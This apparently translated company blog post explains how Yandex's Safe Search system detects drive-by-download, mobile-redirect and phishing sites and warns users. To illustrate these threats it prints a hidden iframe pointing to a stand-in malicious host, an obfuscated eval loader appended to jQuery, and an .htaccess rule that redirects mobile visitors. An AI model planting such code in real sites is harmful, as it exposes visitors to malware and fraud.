Yandex Secure Search system device

In 2007, Yandex encountered a virus that massively replaced Yandex search results on users' computers. Instead of relevant results, ads not related to the query were substituted. It was urgent to seek a solution to the problem. Studying it, we found out that the virus gets to user computers using drive-by-download attacks. Infected pages initiate hidden downloads of malicious files. Then, exploiting the vulnerabilities of the user system, malware is installed on the computer.

Anti-virus programs do not always protect users from this type of attack and new, just repackaged malware, so users need additional protection. We realized that in order to overcome this phenomenon, it is necessary to detect infection of sites, help webmasters to remove malicious code, and also motivate them not to participate in partner networks through which drive-by-download-attack blocks are distributed.

image


At a certain point, it became clear that the problem is of an ecosystem nature, and that if you do not deal with the viral and fraudulent monetization of sites, its scale will grow rapidly. Ultimately, this will undermine users' trust in the Internet, interfere with its growth and even jeopardize its existence in the form we are used to. Therefore, six years ago, we began to design and develop a system for detecting dangerous sites, and four years ago it was launched. Now we continue to actively develop our system, adapt it to new threats, apply methods that allow us to detect malicious code that has not yet reached the signature anti-virus database.

How Yandex anti-virus scan works



It all starts with the fact that our anti-virus robot visits the page being checked and downloads all the data that, when viewed, gets into the browsers of ordinary users. Then the downloaded data is analyzed.

The behavioral analyzer monitors everything that happens when viewing a page, including the operation of the browser, plug-ins (in particular, those designed to execute Java code and view PDF files ) and the operating system as a whole. Observation results are compared with patterns of malicious behavior. The main advantage of the behavioral approach is the ability to detect malicious code whose signatures have not yet reached the anti-virus database. This is the code that is often used by cybercriminals to infect large sites.

In addition, we observe whether, during the page loading process, access to servers that are known as malicious code distributors occurs. This is how our blacklist works.

As an additional means of protection, we conduct a signature analysis of the search base using the Sophos antivirus scanner. We have developed a mutually beneficial cooperation with this company: they understand the importance of the data we provide, quickly respond to our requests and train their system.

The determination of patterns of behavior of malware is done by our biological analyzers - virus analysts. They conduct research on modern samples of malicious code, identify common signs and patterns in their work. The research results are used to improve behavioral detectors, and expand the blacklist, and are also sent as examples of malicious code to Sophos.

In total, the system performs more than 20 million checks per day, as a result of which about 5,000 new infections are detected and infection of more than 80 thousand sites is confirmed. The more popular the site and the greater the risk of infection - the more often it is checked by our system.

What are we protecting from?


Drive-by-download attacks continue to hold the lead in the number of attacks on Internet users. During their implementation, cybercriminals embed malicious code in legitimate web applications that, in addition to the contents of the site, download specially crafted web pages that, using vulnerabilities in browsers and other software, covertly install malicious programs for users.

Such code may look, for example, as follows:

 <iframe src="http://evilsite.ws/wp-content/plugins/wordpress-importer/cash.php" width="13" height="14" frameborder="0" style="visibility: hidden; display: none"></iframe>


Usually, a link in an iframe contains obfuscated code. In this way, attackers try to prevent signature detection.

Obfuscation is also used when adding malicious code to the end of a legal library, for example, jQuery. To protect yourself from attacks of this kind, you can not store JS libraries on your server, but take them from reliable sources. Yandex has its own hosting of popular JavaScript libraries, which everyone can use.

 /*! jQuery v1.8.2 jquery.com | jquery.org/licence */
(function(a,b){function G(a){var b=F[a]={};return p.each(a.split(s),function(a,c){b{c}=!0}),b}
/* jQuery code cutted */
&&define("jquery",[],function(){return})})(window); //end of jquery code
var domain = 'http://somedomain.ru';
v = "v" + "al";
if (020 === 0x10 && window.document) {
try {
document.body++
} catch(gdsgsdg) {
asd = 0;
try {
d = document.createElement("div");
d.innerHTML.a = "asd";
}catch (agdsg) {
asd = 1;
}
if (!asd) {
w = {a:window},a;
v = "e".contact(v);
}
}
}
e = w["" + v];


With the proliferation of mobile devices, attacks on them are becoming increasingly popular. The most common scenario in this case is as follows: the site owner enters into the affiliate program in order to monetize mobile traffic, and, often without knowing it, places a mobile redirect on his page. When viewed through a normal browser, the site behaves in a completely normal way. But if you go to it from a mobile device, it will redirect to another page where the user will be asked to install some application, for example, an “updated” version of the browser. At the same time, depending on the User Agent, sites offer to download files with different extensions corresponding to the platform. Next, the user will be prompted to send a paid SMS, or the installed application will itself send such messages without the user's knowledge. If the application managed to access the user's contact list, it can be used to send spam.

image

To implement such an attack, it is enough to modify the .htaccess file of the web server by adding the redirect conditions to it:

RewriteCond    %{HTTP_USER_AGENT}  (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk|bada|windows\ phone)  [NC]
RewriteRule    (.*)    http://<сайт_куда редиректит> [L,R=302]


Our detection tools track these sites. They do not get on the pages of mobile issuance, and warnings are shown in our browser for Android and iOS before entering sites with redirects.

image

In addition to the already mentioned drive-by-download attacks, and redirects to pages with malware downloads, a redirect to a phishing page that completely copies its interface can be placed on the site. Such sites usually require the input of user personal information that is used for fraudulent purposes, as well as for sending spam.

Phishing attacks can also include cases where a banner is posted on the site offering to download a new version of the browser. When you try to download the installation file, the site offers to enter the phone number to which the confirmation code will be sent. Allegedly, you prove that you are not a robot. But in fact, you will be subscribed to a paid service. Often, these banners are the result of hacking a site or participating in unscrupulous affiliate programs.

image

Hazard warnings



image

Information about the malicious sites we have found is in the database. Currently, we know more than 200 thousand infected and phishing sites around the world, of which about 20% have domains in zones belonging to Russia and the CIS countries.

Upon detection of an infected website, we send it to the webmaster emails on standard addresses and contacts listed in the registration of domain information. This reduces the average time that a site remains infected by approximately 1.6 times.

In the future, this data is used to alert users on the search page , in Yandex.Mail , Browser , as well as Opera and Mozilla Firefox with Yandex.Elements installed. On average, we show about 5 million warnings on the search results page and in services, as well as about 3 million in browsers, but during periods of mass infection of sites this number can reach up to 18 million warnings per day.

Users can protect themselves with the Yandex.DNS service . Our DNS server, available at 77.88.8.88, provides filtering of dangerous sites and displays warnings when trying to access them.

Transitions to external links in Yandex.Mail are run through a special warning redirector. It compares the link with the URL mask of infected sites and, if a match is found, redirects to a special warning page. After which the user himself can decide whether he should go further.

I would especially like to note that the links themselves from letters from Yandex.Mail are not transmitted anywhere and are not checked by the Safe Search system, but are exclusively compared with URL masks of dangerous sites already known to Yandex. Custom links in the Mail remain confidential and are never used for indexing or displaying contextual advertising.

For infected sites registered in Yandex.Webmaster , we show detailed infection information. If the webmaster himself cannot remove the infection and eliminate its causes, he can turn to technical support for help.

To check the URL for malware, you can connect to the Yandex Safe Browsing API , or use virustotal.com - it uses the Safe Yandex Search as one of the URL scanners.

Samples of malware running on the web server side (for example, server backdoors, malicious Apache modules, infected CMS templates), we will be happy to receive at virus-samples@yandex-team.ru.

For cooperation, please contact safesearch@yandex-team.ru .
The Yandex Antivirus Technology & Safe Search booth will be located at YaC, where you can chat with our virus analysts, participate in the malware detection contest, and learn more about the Safe Browsing API.